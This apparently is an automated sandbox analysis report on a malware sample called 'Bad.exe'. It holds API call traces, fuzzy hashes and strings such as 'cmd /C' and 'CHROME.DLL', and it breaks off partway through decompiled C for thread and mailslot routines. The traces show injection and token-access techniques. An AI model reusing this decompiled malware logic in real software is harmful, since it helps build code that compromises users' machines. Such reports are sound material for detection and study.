  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2B66, Relevance: 5.2, APIs: 4, Instructions: 156 Total matches: 79memory
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 66839

General

Root Process Name:d3d8sext.exe
Process MD5:B58623B61A3D254FB9FF47FF0A4A74C6
Total matches:152
Initial Analysis Report:Open
Initial sample Analysis ID:66839
Initial sample SHA 256:20CE262F54448C1424662B74706D81FAB421EB8F550C39A18CDB89DD9F15CB07
Initial sample name:Bad.exe

Similar Executed Functions

Function 001CDA13, Relevance: 10.6, APIs: 7, Instructions: 111 Total matches: 36string
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
